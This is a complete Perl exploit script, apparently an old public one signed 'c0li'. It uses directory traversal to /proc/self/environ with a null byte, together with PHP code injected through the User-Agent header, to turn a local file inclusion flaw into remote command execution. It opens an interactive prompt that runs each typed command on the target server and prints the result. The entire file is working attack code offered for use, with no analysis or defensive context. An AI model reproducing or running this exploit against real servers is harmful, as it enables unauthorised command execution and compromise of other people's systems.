#!/usr/bin/perl

use LWP::UserAgent;
use HTTP::Request;

if (my $OS ne 'MSWin32') { system("clear"); }

if (@ARGV != 1) { print "\n[usage] perl $0 <url>\n"; exit(); }

my $target = $ARGV[0];
my $environ = '../../../../../../../../../../../../../../../../proc/self/environ%00';

if ($target =~ /^http:/ ) { $target =~ s/http:\/\///g; }

print "\nc0li\@RCE> ";
chomp($cmd=<STDIN>);

while($cmd ne "exit") {
    my $content = get_content($target.$environ, $cmd);
    if ($content =~ /c0li#(.*)#c0li/sg) { print $1; }
    else { print "RCE Failed.\n"; }
    print "c0li\@RCE> ";
    chomp($cmd=<STDIN>);
}

sub get_content {
    my $url = $_[0];
    my $rce = $_[1];
    my $agent = "<?php echo \"c0li#\"; system(\'".$rce."\'); echo \"#c0li\"; ?>";
    my $ua = LWP::UserAgent->new(agent => $agent);
    $ua->timeout(60);
    my $req = HTTP::Request->new(GET => 'http://'.$url);
    my $response = $ua->request($req);
    return $response->content;
}